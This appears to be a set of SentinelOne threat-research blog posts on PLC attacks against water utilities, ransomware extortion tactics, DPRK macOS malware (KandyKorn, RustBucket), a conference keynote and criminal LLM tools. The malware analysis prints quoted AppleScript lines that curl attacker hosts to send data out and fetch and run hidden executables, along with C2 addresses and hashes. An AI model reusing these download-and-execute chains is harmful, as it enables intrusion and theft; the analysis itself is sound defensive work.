Earlier this week, CISA released an advisory warning of active exploitation of Programmable Logic Controllers (PLCs) used in Water and Wastewater treatment plants following intrusions into two U.S. critical infrastructure installations. The advisory and attacks come in the wake of increased public threats made by the Iran-backed Cyber Av3ngers “hacktivist” group to target industries using Israeli-manufactured OT and ICS equipment.

In this post, we describe the background to these attacks and detail recent Cyber Av3ngers activity, exploring the wider implications for critical infrastructure security and how organizations can mitigate these cyber risks.

Intrusion at the Municipal Water Authority of Aliquippa

On November 25, 2023, The Municipal Water Authority of Aliquippa disclosed an attack in which it lost control of one of the booster stations for the area. The attackers appear to have compromised a Unitronics PLC by exploiting weak or default passwords along with targeting the default and well-documented programming port for these devices.

The attackers renamed the PLC to “Gaza” and defaced the user interface.

In addition, federal officials have indicated that a number of other water authorities on the east coast of the United States have been impacted by the Cyber Av3ngers, as well as at least one aquarium and a brewery. The Full Pint Beer brewery in Pittsburgh shared images on social media on 28th November showing similar defacement of a Unitronics PLCs in use as part of their control system.

Who Are Cyber Av3ngers?

Cyber Av3ngers is an IRGC-aligned threat actor whose primary mission is to sow discord and create a sense of heightened risk from technically unsophisticated hacks. The group has a history of making false claims such as breaching the Dorad power station. Attacks by the similarly-named Cyber Avengers, active since 2020, have been claimed by those operating the Cyber Av3ngers social media channels.

The recent attacks follow weeks of social media posturing by Cyber Av3ngers. On October 29, 2023, the group posted a promotional ‘countdown’ style video indicating that the group would be unveiling “one of the greatest cyber attacks on Israel infrastructure” within 24 hours.

On October 30th, the Cyber Av3ngers initiated a series of posts across their Telegram and Twitter/X communication channels claiming to have infiltrated “10 Water treatment stations” across Israel. Prior to that, the same channels had been used to post a small set of files they claim had been exfiltrated from these targets.

Throughout the following weeks, the group maintained its social media campaign with threats to “wipe and destruct all industrial equipment such as SCADA systems, PLCs and HMIs”. However, it was only on 26th November that the group’s threats expanded to include targeting of all critical infrastructure, including plants in the U.S., found to be using equipment manufactured in, or associated with, Israel.

Targeting and Tooling

The current campaign targets Unitronics PLCs exposed to the public internet. A high-level search via Shodan indicates approximately 1800 Unitronics PLC devices are reachable globally. Around 280 of those are of the type in use by the Municipal Water Authority of Aliquippa.

Threat actors are scanning for exposed Unitronics devices listening on TCP port 20256, and when discovered, interrogating and where possible connecting to the vulnerable endpoint.

Cyber Av3ngers are known to use open source to conduct scanning, discovery and exploitation of OT and ICS devices. In particular, they leverage scripts specific to PCOM/TCP to query systems using Unitronics PLCs.

Industrial Control Systems equipment often comes with default passwords and backdoor ‘service’ or ‘admin’ accounts for remote administration. These are documented in publicly available operation manuals and represent a vulnerability if the installer or maintainer of the equipment did not take steps to change passwords and generally harden the devices against external attack.

Screenshots shared by the group on social media show the use of such open-source tools for scanning a range of exploitable ICS devices, including Siemens and SCADA devices.

The group has also previously exploited CVE-2023-28130, a remote command execution vulnerability in CheckPoint’s GAIA.

Additional Targeting of OT/ICS Equipment

The nature of many ICS/OT installations means they are often exposed to vulnerabilities and weak or unchanged default passwords. This, combined with their service-critical use, means they are both an easy and attractive target for threat actors.

Unsurprisingly, we find that Cyber Av3neger are neither the only nor the first group to target such systems. Unitronics PLCs, in particular, have also recently been singled out for targeting by another Gaza-related hacktivist group called ‘GhostSec’.

On October 13, 2023, GhostSec posted messages claiming to have hacked a number of Unitronics devices along with 27 Aegis devices used to control water pumps.

Mitigating Risks to Unitronics PLCs and Other ICS Devices

In order to harden exposed devices, administrators are urged to follow CISA’s recommendations:

• Change the Unitronics PLC default password and validate that the default password “1111” is not in use.
• Require MFA for remote access to the OT network, including from the IT network and external networks.
• Disconnect the PLC from the open internet. If remote access is necessary, implement a Firewall/VPN in front of the PLC to control network access to the remote PLC. A VPN or gateway device can enable MFA if it is not supported by the device. Unitronics also has a secure cellular based longhaul transport device that is secure to their cloud services.
• Back up the logic and configurations on any Unitronics PLCs to enable fast recovery. Become familiar with the process for factory resetting and deploying configurations to a device in the event of being hit by ransomware.
• If possible, utilize a TCP port that is different from the default port TCP 20256. If available, use PCOM/TCP filters to parse out packets.
• Update PLC/HMI to the latest version provided by Unitronics.

Conclusion

Groups escalating their presence and activities following the onset of the Israel-Hamas war are flooding social media with elaborate claims and grand threats of massive intrusions. Though inevitably exaggerated, groups like Cyber Av3ngers do present risk to critical infrastructure installations, albeit at present one that remains of low-impact. It is also important to see Cyber Av3ngers in the context of being an aspect of the IRGC. The goal here may be as much to do with Iranian-aligned propaganda as it is to do with causing material harm.

However, defenders should take such activity as an opportunity to understand weaknesses that need to be mitigated before more serious harm can be done. From a technical perspective, awareness continues to be paramount. Mitigating known risks will stop such opportunistic attacks from impacting devices and minimize the potential of service disruption.

To learn about how SentinelOne can help protect your organization from cyber threats, contact us or request a free demo.

A little over a year ago, we described how ransomware operators had evolved their tactics from simple file locking to more sophisticated forms of extortion in Ransoms Without Ransomware, Data Corruption and Other New Tactics in Cyber Extortion. Since then, cybercrime actors have not stood still, and we are currently seeing the emergence of a brace of new tactics to wrest funds out of organizations and their clients in the wake of a business network compromise.

We observe that data theft and data destruction continue to be primary tools in the cybercriminal’s arsenal, along with partial and full file encryption. Added to that, however, we have begun to see the use of new levers that attempt to shame, blame or otherwise coerce victims into paying the ransom demanded by attackers.

In this post, we describe the emergence of these new tactics in cyber extortion to help defenders better understand the continuing development of threat actor behaviors.

Extortion Through Leveraging the Law

In mid-2023, the United States Securities and Exchange Commission approved updated requirements around cybersecurity incident reporting. These new requirements require that all companies disclose cybersecurity incidents, along with all the pertinent details, with the SEC within four days of becoming aware of a breach incident.

The new requirements are set to take effect from 18th December, 2023 for larger organizations and from June 2024 for all others. However, some ransomware operators have already adopted tactics that seek to leverage the new rules about breach disclosure to threaten victims even before they have taken effect.

On November 7th, the ALPHV gang breached MeridianLink in a data theft operation that did not involve the deployment of ransomware. The victim – a large financial services enterprise with dealings in mortgage lending, credit unions and banking products and services – subsequently stated that they became aware of the breach on November 10th.

According to the attackers, the victim was threatened with being reported to the SEC if they failed to pay within 24 hours.

On November 15, ALPHV added MeridianLink to its TOR-based data leaks website along with excerpts and screenshots of the complaint they filed to the SEC alleging that the enterprise had failed to report the breach within four days.

Although in this case the rules were not in force at the time, it is clear that going forward threat actors will use this as a tactic to pressure victims. The aim would appear to be to prevent organizations stalling for time while trying to mitigate the damage, negotiate the payment amount, or otherwise avoid revealing the disclosure to their partners, clients and other affected parties.

The Threat of Exposing Incriminating Data

While the threat of exposing stolen data has now been used for some time as an additional form of leverage, there have been few cases where the nature of the data itself has been used to pressure a victim to pay. Where those have occurred, they have centered around sensitive, proprietary data that companies would not wish to fall into the hands of competitors.

However, a recent breach by affiliates of the Rhysida ransomware operation was followed by a threat to publish data that itself constitutes a criminal offense for the victim to possess. In this case, the ransomware operators allege that data stolen from Mount St. Mary’s Seminary, a school that prepares “candidates for the Catholic priesthood”, contained “child erotica”.

“Ready to provide evidence of child erotica stored on this network. Willing to cooperate with detectives and journalists. These materials will not be published on our site.”

The implications here are complex and concerning. Even the allegation of such threatens the reputation of the victim organization, even if untrue. It is easy for threat actors to make damaging claims and refuse to provide the evidence. As a tactic, threatening to publicize such claims can exert pressure on victim organizations, particularly if they cannot verify for themselves whether such data exists.

If true, there are obvious legal implications and reputational consequences for the organization even if the crime is the sole responsibility of a single individual. In such circumstances, threat actors can ramp up the pressure on victims to pay in the hope that the data will not be exposed to law enforcement.

While the specific nature of the incriminating data in this incident may not be (one would like to think) something widely found on business networks, the greater lesson is that threat actors can and will leverage not only business data but also personal employee data that may be stored on compromised business computers.

Enterprises need to ensure that strict policies are in place to prevent employees using organizational computers for personal use, and that these policies are enforced, along with ensuring all endpoints are properly protected against compromise.

Trading Victims Off Against GDPR & Other Regulators

Ever since 2018, GDPR and similar regulations have had an important impact on the way companies store and retain data. Backed by the threat of heavy financial penalties, GDPR is a powerful motivator to ensure organizations prioritize data privacy in their operations.

Threat actors have leveraged the threat of penalties for breaching GDPR rules in the past. For example, in 2021, DoppelPaymer successor Grief (aka PayorGrief) cited GDPR violations to exert pressure on victims.

However, more forceful GDPR-related threats have been observed in 2023. The previously mentioned ALPHV gang attempts to pressure victims by scaring their customer base. On  November 14, 2023, the organization “Naftor and Groupa Pern” was added to the ALPHV blog with scare text claiming the company did not observe GDPR rules and that its customers’ data could be leaked as a result.

WARNING!

COOPERATION WITH NAFTOR AND GRUPA PERN MAY RESULT IN THE LEAKAGE OF YOUR DATA. THESE COMPANIES DO NOT COMPLY WITH THE LAWS OF THE EUROPEAN UNION AND IN PARTICULAR THE GDPR. YOU MAY INCUR LEGAL AND FINANCIAL RISKS BY WORKING WITH THEM!

More direct leverage of GDPR was recently seen as a tactic used by the short-lived and now-defunct Ransomed.VC gang. This group threatened victims with disclosure of GDPR violations in the event they did not conform to the ransom demands. The extortion demands would be purposefully set at a price lower than the potential GDPR fines in an attempt to entice the victim to pay by offering a less financially-painful option.

Conclusion

Legal frameworks such as the SEC’s new cybersecurity incident reporting rules, GDPR regulations and standing laws on prohibited data are being exploited to exert further pressure on vulnerable organizations. These latest cyber tactics attempt to force victims into meeting ransom demands by raising fears of both legal liability and reputational damage.

The emergence of such tactics underscores the need for organizations to strengthen their cybersecurity posture, ensure compliance with regulatory requirements and to remain prepared for the evolving nature of today’s cyber threats. Cybercriminals are highly motivated to develop new and creative ways to extort businesses, and cyber defenders need to remain vigilant and adaptive in their strategies to defend against these evolving threats.

To learn about how SentinelOne can help protect your organization from ransomware and other threats, contact us or request a free demo.

North Korean-aligned threat actors targeting macOS have had a busy 2023, with two major campaigns noted so far: RustBucket and KandyKorn. The initial RustBucket campaign used a second-stage malware, dubbed ‘SwiftLoader’, which functioned externally as a PDF Viewer for a lure document sent to targets. While victims viewed the lure, SwiftLoader retrieved and executed a further stage malware written in Rust. The KandyKorn campaign, meanwhile, was an elaborate multi-stage operation targeting blockchain engineers of a crypto exchange platform. Python scripts were used to drop malware that hijacked the host’s installed Discord app, and subsequently delivered a backdoor RAT written in C++ dubbed ‘KandyKorn’.

Our analysis of further activity in these campaigns suggests that DPRK threat actors are now ‘mixing and matching’ components from these operations, with SwiftLoader droppers being used to deliver KandyKorn payloads. In this post, we provide an extensive review of this activity and provide further indicators to help security teams defend their organizations.

Overview of KandyKorn

Research by Elastic published in early November 2023 described a sophisticated intrusion by DPRK-aligned threat actors. The compromise involved a five-stage attack that began with social engineering via Discord to trick targets into downloading a malicious Python application disguised as a cryptocurrency arbitrage bot, a popular tool among crypto traders. The Python application was distributed as Cross-Platform Bridges.zip and contained multiple benign Python scripts. We summarize the previous research into KandyKorn as follows:

Stage 0

A Discord user is socially engineered into downloading a malicious Python application, Cross-Platform Bridges.zip. Initially, links to the malware were sent to targets via direct message with the malware hosted on Google drive.

https[:]//drive.google[.]com/file/d1KW5nQ8MZccug6Mp4QtKyWLT3HIZzHNIL2

The application’s Main.py script imports the included Watcher.py file as a module.

Stage 1

Watcher.py checks the local Python version and downloads and executes testSpeed.py. The script downloads and executes another Python script, FinderTools. The former is deleted after execution while the latter is written to /Users/Shared/FinderTools.

Stage 2

FinderTools downloads and executes a Mach-O binary, dubbed SUGARLOADER, at /Users/Shared/.sld. The same file is also copied twice as .log and as appname, both within the Discord application’s hierarchy at /Applications/Discord.app/Contents/MacOS/.

Written in C++, SUGARLOADER checks for the existence of a configuration file at /Library/Caches/com.apple.safari.ck and downloads it from a remote C2 if missing. The C2 address is hardcoded into the FinderTools script and passed as an execution argument to the SUGARLOADER binary on the command line.

In the intrusion seen by Elastic, the C2 used by FinderTools was hosted on the domain tp.globa.xyz.

tp-globa.xyz/OdhLca1mLUp/lZ5rZPxWsh/7yZKYQI43S/fP7savDX6c/bfC

Stage 3

SUGARLOADER also downloads a Mach-O payload dubbed HLOADER and writes it to /Applications/Discord.app/Contents/MacOS/Discord. The genuine Discord executable is renamed as .lock in the same directory.

After this replacement, when Discord is launched, HLOADER renames itself to MacOS.tmp, renames the .lock file back to Discord, and executes both the genuine Discord binary and the SUGARLOADER executable saved as .log. This causes the entire renaming/reloading process to repeat.

On the assumption that the victim is likely to launch Discord frequently, the purpose of HLOADER is to provide a persistence mechanism that will not be detected by Apple’s monitoring of background login items.

Stage 4

SUGARLOADER retrieves a C2 URL from the configuration file previously stored at com.apple.safari.ck. In the observed intrusion, this was 23.254.226[.]90, communicating over TCP port 44.

SUGARLOADER uses this to retrieve and execute the KANDYKORN remote access trojan in-memory via NSCreateObjectFileImageFromMemory and NSLinkModule. This technique has been used previously in North Korean macOS malware, starting with UnionCryptoTrader back in 2019.

Building off Elastic’s research, we identified a number of other versions of KANDYKORN RAT, with the following SHA1s:

SHA1	First Seen
62267b88fa6393bc1f1eeb778e4da6b564b7011e	Apr 2023
8f6c52d7e82fbfdead3d66ad8c52b372cc9e8b18	Apr 2023
ac336c5082c2606ab8c3fb023949dfc0db2064d5	Apr 2023
26ec4630b4d1116e131c8e2002e9a3ec7494a5cf	Aug 2023
46ac6dc34fc164525e6f7886c8ed5a79654f3fd3	Aug 2023
8d5d214c490eae8f61325839fcc17277e514301e	Aug 2023
9f97edbc1454ef66d6095f979502d17067215a9d	Aug 2023
c45f514a252632cb3851fe45bed34b175370d594	Aug 2023
ce3705baf097cd95f8f696f330372dd00996d29a	Aug 2023
e244ff1d8e66558a443610200476f98f653b8519	Aug 2023
e77270ac0ea05496dd5a2fbccba3e24eb9b863d9	Aug 2023
e68bfa72a4b4289a4cc688e81f9282b1f78ebc1f	Nov 2023

Interesting among these is 26ec4630b4d1116e131c8e2002e9a3ec7494a5cf, which is written to /Users/Shared/.pld, a point we will return to below.

Recent RustBucket activity

In what at first sight appears to be an entirely different campaign, North Korean threat actors have an ongoing and evolving campaign first disclosed by JAMF dubbed RustBucket. This campaign initially involved a first stage AppleScript applet and a Swift-based application bundle called ‘Internal PDF Viewer.app’, which used specially crafted PDFs to unlock code for downloading a Rust-based payload.

#Lazarus #APT
Looks like the target is Apple developers.

8a8de435d71cb0b0ae6d4b15d58b7c85ce3ef8f06b24266c52b2bc49217be257https://t.co/aXVCAFpVP4

— 2ero (@BaoshengbinCumt) November 10, 2023

A number of RustBucket variants have since been sighted. Additionaly, several variations of the Swift-based stager, collectively dubbed SwiftLoader, have come to light over the last few months.

While some of these continued to be distributed with the name “InternalPDF Viewer”, in June researchers spotted a variant called SecurePDF Viewer.app. This application was signed and notarized by Apple (since revoked) by a developer with the name “BBQ BAZAAR PRIVATE LIMITED (7L2UQTVP6F)”. SecurePDF Viewer.app requires at least macOS 12.6 (Monterey), and has the bundle identifier com.softwaredev.swift-ui-test. It is capable of running on both Intel and Apple silicon devices.

The main executable uses curl to reach out to docs-send.online/getBalance/usdt/ethereum. This retrieves a file called /gatewindow/1027/shared/ (c806c7006950dea6c20d3d2800fe46d9350266b6), an AppleScript script that when executed posts the filepath of the executing process to a remote server hosted on swissborg.blog.

set sdf to (POSIX path of (path to me))
set aaas to do shell script "curl -H "Content-Type:application/json" -d '{"zip":""
""}' https[:]//swissborg[.]blog/tx/10299301992/hash"
--display dialog aaas
run script aaas
--display dialog "Can 't open this file. The file maybe damaged."

Connection to ObjCShellz

The swissborg.blog domain contacted by SecurePDF Viewer was previously mentioned by JAMF in an article in early November.

JAMF researchers described what appeared to them as a late stage RustBucket payload distributed as a Mach-O binary called ProcessRequest. The researchers dubbed the malware ObjCShellz, in light of the fact that the code was written in Objective-C and functions to execute simple shell commands from a remote C2 via the system() function invoking sh -c.

Our research shows that ObjCShellz is highly likely a later stage of the SwiftLoader SecurePDF Viewer.app.

SwiftLoader Connection to KandyKorn RAT

Other versions of SwiftLoader have been spotted in the wild, including one distributed in a lure called Crypto-assets and their risks for financial stability[.]app[.]zip.

This looks like #Bluenoroff activity
Crypto-assets and their risks for financial stability[.]app[.]ziphttps://t.co/jzuXP1YiQ6
Communicating with on-global[.]xyz (142[.]11[.]209[.]144)

— KSE (@KSeznec) October 26, 2023

This application is also signed and notarized by Apple (since revoked) by a developer with the name “Northwest Tech-Con Systems Ltd (2C4CB2P247)”. The bundle identifier is com.EdoneViewer and the app’s main executable is EdoneViewer.

There are some interesting overlaps between this version of SwiftLoader and the KandyKorn operation.

Our analysis of EdoneViewer shows it contains a hardcoded URL encoded with a single-byte XOR key of Ox40.

Once decoded, we can see the malware reaches out to the domain on-global.xyz and drops a hidden executable at /Users/Shared/.pw.

D%3D", "http[:]//on-global[.]xyz/Of56cYsfVV8/OJITWH2WFx/Jy5S7hSx0K/fP7saoiPBc/A%3D%3D", 
"/users/shared/Crypto-assets and their risks for financial stability.pdf", "/users/shared/.pw"}
do shell script "curl -o "" & p & "" " & d & a & "&& open "" & p & """ & "&& 
curl -o " & b & " " & s & a & " -d pw" & "&& chmod 770 " & b & "&& 
/bin/zsh -c "" & b & " " & s & " &" &> /dev/null"

We note that the KandyKorn Python script FinderTools reached out for its next stage to malware hosted on the domain tp.globa.xyz and that SUGARLOADER dropped hidden files at /Users/Shared/.sld.

The .pw executable, named download.bin on VirusTotal (060a5d189ccf3fc32a758f1e218f814f6ce81744), takes the URL hardcoded in the EdoneViewer binary as a launch argument. Unfortunately, the C2 did not respond with a download on our test, but the file contains a hardcoded reference to /Users/Shared/.pld for the download path.

Recall that we discovered a variant of KANDYKORN RAT with the same file name .pld above (26ec4630b4d1116e131c8e2002e9a3ec7494a5cf). We assess with medium confidence that /Users/Shared/.pld refers to the same .pld KandyKorn RAT given the overlaps in infrastructure, objectives and TTPs noted here and by previously mentioned researchers.

SentinelOne Customers Protected from KandyKorn and RustBucket Malware

SentinelOne Singularity detects and protects against all known components of KandyKorn and RustBucket malware.

Conclusion

Our analysis has established new connections between previous research findings. We note specific shared infrastructure that indicates a link between ObjCShellz payloads and SwiftLoader stagers. We also provide the first clues that RustBucket droppers and KandyKorn payloads are likely being shared as part of the same infection chain.

Our analysis corroborates findings from other researchers that North Korean-linked threat actors’ tendency to reuse shared infrastrucutre affords us the opportunity to widen our understanding of their activity and discover fresh indicators of compromise. Below we provide a list of indicators we observed and analyzed in this research.

Indicators of Compromise

SUGARLOADER
d28830d87fc71091f003818ef08ff0b723b3f358

HLOADER
43f987c15ae67b1183c4c442dc3b784faf2df090

KANDYKORN RAT
26ec4630b4d1116e131c8e2002e9a3ec7494a5cf
46ac6dc34fc164525e6f7886c8ed5a79654f3fd3
62267b88fa6393bc1f1eeb778e4da6b564b7011e
8d5d214c490eae8f61325839fcc17277e514301e
8f6c52d7e82fbfdead3d66ad8c52b372cc9e8b18
9f97edbc1454ef66d6095f979502d17067215a9d
ac336c5082c2606ab8c3fb023949dfc0db2064d5
c45f514a252632cb3851fe45bed34b175370d594
ce3705baf097cd95f8f696f330372dd00996d29a
e244ff1d8e66558a443610200476f98f653b8519
e68bfa72a4b4289a4cc688e81f9282b1f78ebc1f
e77270ac0ea05496dd5a2fbccba3e24eb9b863d9

ObjCShell
79337ccda23c67f8cfd9f43a6d3cf05fd01d1588

SecurePDF Viewer
a1a8a855f64a6b530f5116a3785a693d78ec09c0
e275deb68cdff336cb4175819a09dbaf0e1b68f6

Crypto-assets and their risks for financial stability.app
09ade0cb777f4a4e0682309a4bc1d0f7d4d7a036
5c93052713f317431bf232a2894658a3a4ebfad9
884cebf1ad0e65f4da60c04bc31f62f796f90d79
be903ded39cbc8332cefd9ebbe7a66d95e9d6522

Downloader
060a5d189ccf3fc32a758f1e218f814f6ce81744

Remotely-hosted AppleScript
3c887ece654ea46b1778d3c7a8a6a7c7c7cfa61c
c806c7006950dea6c20d3d2800fe46d9350266b6

Network Communications

http[:]//docs-send.online/getBalance/usdt/ethereum
https[:]//drive.google[.]com/file/d1KW5nQ8MZccug6Mp4QtKyWLT3HIZzHNIL2
http[:]//on-global[.]xyz/Of56cYsfVV8/OJITWH2WFx/Jy5S7hSx0K/fP7saoiPBc/A%3D%3D
http[:]//tp-globa[.]xyz/OdhLca1mLUp/lZ5rZPxWsh/7yZKYQI43S/fP7savDX6c/bfC
http[:]//swissborg[.]blog/zxcv/bnm

23.254.226[.]90
104.168.214[.]151
142.11.209[.]144
192.119.64[.]43

File paths

/Applications/Discord.app/Contents/MacOS/.log
/Applications/Discord.app/Contents/MacOS/appname
/Library/Caches/com.apple.safari.ck
/tmp/tempXXXXXX
/Users/Shared/.pld
/Users/Shared/.pw
/Users/Shared/.sld

At this year’s VirusBulletin conference, VB2023, SentinelOne’s Juan Andrés Guerrero Saade, a.k.a. JAGS, Associate Vice President of SentinelLabs delivered a keynote speech calling for a reevaluation of the conventional understanding of the cybersecurity sector. His talk, “The Physics of Information Asymmetry” challenged us to reconsider and reinterpret the fundamental concepts and language of our discipline.

Redefining the Language of Cybersecurity | A Critical Analysis

Juan Andrés opened the talk by critiquing the reliance on military and intelligence metaphors in cybersecurity. This borrowed lexicon, while providing a foundational language in the discipline’s infancy, has, over time, led to a narrowed perspective.

JAGS argued that terms like ‘cyber attack’ and ‘cyber domain,’ are rooted in a militaristic worldview and limit our strategic approach to digital defense. Are we, as cybersecurity professionals, constrained by the language we use? How would our strategies change if we broke free from these traditional paradigms?

Decoding Information Asymmetry

A central theme of the keynote was the concept of information asymmetry between attackers and defenders. This imbalance is not merely a tactical disadvantage but a core characteristic that shapes the landscape of cyber conflict.

Juan Andrés elaborated on how this asymmetry transcends mere knowledge gaps and engenders differing perceptions, capabilities, and intents. He challenged the audience to think beyond the conventional ‘cat and mouse’ game and consider the broader implications of this asymmetry. How does it influence our approach to defense? What new strategies could emerge if we fully understood and redefined cybersecurity in terms of information asymmetry?

Rewriting Cybersecurity Metaphors | A Call for Conceptual Revolution

There are no simple solutions when addressing such foundational issues, but the industry can only move forward by rising to the challenge. Juan Andrés advocates for a complete overhaul of the metaphors underpinning cybersecurity. Drawing from diverse fields like physics and information theory, he suggested that adopting new metaphors could lead to more effective and nuanced cybersecurity strategies.

This metaphorical shift isn’t merely semantics but a fundamental rethink of how we conceptualize cyber threats and defenses. What new models and frameworks could we develop if we freed ourselves from the current paradigms?

Leveraging External Expertise | Broadening Our Cybersecurity Horizon

Central to this new approach was the need to untap the potential of integrating insights from adjacent fields into cybersecurity. The industry as it now stands is unique in being insulated from valuable contributions from related disciplines such as information theory, control theory, complex adaptive systems, and statistics. This is a situation that must change if we are to evolve our practice and knowledge, and ultimately defend organizations more successfully.

An interdisciplinary approach, JAGS suggested, could unlock new perspectives and solutions, propelling our understanding of cybersecurity challenges to new heights. What innovative approaches might emerge from such collaborations? How can insights from these fields enrich our strategies and tools?

Conclusion | Charting a New Course in Cybersecurity

Juan Andrés Guerrero Saade’s keynote at VB2023 offered a compelling perspective on the future of cybersecurity. A thoughtful critique of current practices, it suggested a need for a shift in how we understand and tackle digital threats. The call to integrate ideas from various fields challenges us to think differently about how we conceptualize our discipline and what that means for its accessibility to others.

In this blog post, we delve into the notable trends shaping the cyber threat landscape over the past month. Hot topics this month revolve around the expanding use of generative AIs by cybercriminals, the ongoing surge of ransomware campaigns, and the latest developments in cyber warfare related to the Israel-Hamas war.

Crimeware Scene Continues to Explore Advantages of LLMs

AI-centric tools and services continue to emerge, with a number of notable developments since our October 2023 update. Though a relatively new market for threat actors, the types of services on offer are evolving quickly.

One tool that has emerged in recent weeks is FraudGPT, which advertises itself as “Not just a GPT LLM, but an all inclusive, testing, cracking, action and access tool” with the ability to “Generate scam emails, identify malicious code, and uncover leaks and vulnerabilities in seconds”.

Combining the GPT LLM with other tools allows powerful potential for automated havoc. For example, FraudGPT includes integration with an expanding CVE database. This allows attackers to check whether targets are vulnerable to any known software bugs, allowing them to tailor their operation via simple text-based prompts.

For cybercriminals, the cost is not prohibitive. One FraudGPT seller offers varied subscription options ranging from 89.003 euros per month to 749.00 euros “Lifetime Pro” options. Customized private builds are also advertised at prices starting at 1899.99 euros.

WolfGPT is another tool for sale offering similar functionality. Its feature set includes:

• Generation of malware and ransomware
• Automated writing of scam emails
• Automated writing of “fake news and misinformation”
• Vulnerability discovery
• Multiple AI models
• Unlimited Characters
• Privacy and performance focused

So-called “Lifetime” licenses for the current version of WolfGPT go for USD $300.

Ransomware Hits Financial, Education and Healthcare Sectors

China’s largest Bank, ICBC, was extorted by LockBit, it was reported this month. The attack on the Industrial and Commercial Bank of China is notable given the sheer size and ‘position in the world economy’ that the ICBC holds. According to sources, the ICBC’s U.S. unit was impacted to such an extent that trades representing “billions of US dollars” had to be conducted by transferring information on USB sticks as its computer systems were isolated from the rest of Wall Street.

Elsewhere, an attack on the Toronto Public Library has been attributed to Black Basta ransomware group. The attack is said to have led to “significant disruptions” as all internal systems went down in response to the incident.

In early November 2023, JAE (Japan Aviation Electronics) was targeted by ALPHV (aka BlackCat).

Among other attacks attributed to the ALPHV group this month is a claim to have infiltrated Dragos, a cybersecurity provider focused on industrial control systems.

Confirmation of this attack remains uncertain at the time of writing. A post briefly appeared on the ALPHV blog on November 11, 2023 claiming that Dragos had been breached, but that has since been removed.

In September’s update we reported on the activities of Ransomed.VC. This group has now ceased operations. The developer(s) posted on Telegram and other forums claiming that:

“The project ransomedvc is up for sale…I do not want to continue running the project due to personal reasons, none will be disclosed to journalists, don’t even ask. We are selling everything”

The operator was asking for USD $10 million for its clearnet and TOR domains, ransomware builders and source, affiliate group access, and social media accounts

However, a subsequent message claimed that members of its group had been arrested and that the entire operation was being shut down due to the risks.

That said, the operator continues to solicit interest in a new private project via the same Telegram channel, so watch this space.

Israel-Hamas Conflict | Destructive Wipers Begin to Emerge

As we saw during the early stages of the Russian invasion of Ukraine, cyber warfare actors were quick to begin destructive wiper campaigns. A similar trend is now being seen in the Israel-Hamas war.

Between October 30th 2023 and November 2nd 2023, a series of wipers began targeting systems across Israel. The wipers, collectively known as “Bibi” wipers, are designed to resemble ransomware but in fact simply overwrite the victims data, with no possibility of recovery. In some of the early variants seen, affected files are renamed with a .BiBi1 file extension.

Variants for both Linux and Windows systems have been noted. When launched all accessible files are overwritten, including core OS files and data. The malware has an option to allow an attacker to specify a target directory for wiping rather than the entire machine.

The malware also executes commands designed to prevent interruption of execution and to hinder attempts at recovery through deletion of the system VSS backups.

Additionally, on November 13, 2023, Israeli’s CERT published an alert with details and indicators of further wiper attacks, including the following suspected wiper hashes:

27e28737415e9d6a45b5afb03c7b33038df8f800
44f2e8860e2935e900446dc5dea31508c71701ff
48bc39011e06931b319d873a4d2a0cff5b119cdf

These most recent wipers are attributed to Iranian threat actors (BlackShadow aka DEV-0022).

Conclusion

The cybercrime ecosphere continues to explore the use of LLMs, with more offerings of AI-powered tools designed to lower the barrier to entry into cybercrime and make attacks more efficient. Meanwhile, ransomware actors like LockBit and ALPHV have been actively attacking some big name targets as well as public sector healthcare and education providers. The emergence and deployment of multiple variants of wiper malware, while not entirely surprising, represents a new development in cyber threat activity related to the Israel-Hamas war. As past conflicts have shown, such cyber weapons have a very real possibility of affecting targets far from those initially intended.

In the face of these emerging trends, employing a comprehensive security solution like Singularity XDR, which leverages AI and automated remediation, can serve as a potent weapon in an organization’s cybersecurity arsenal. It’s more crucial than ever to stay ahead of the curve, adopting proactive measures that help detect and mitigate threats before they can inflict significant damage.

To learn more about how SentinelOne can help defend your organization’s endpoint, cloud, and network assets, contact us or request a free demo.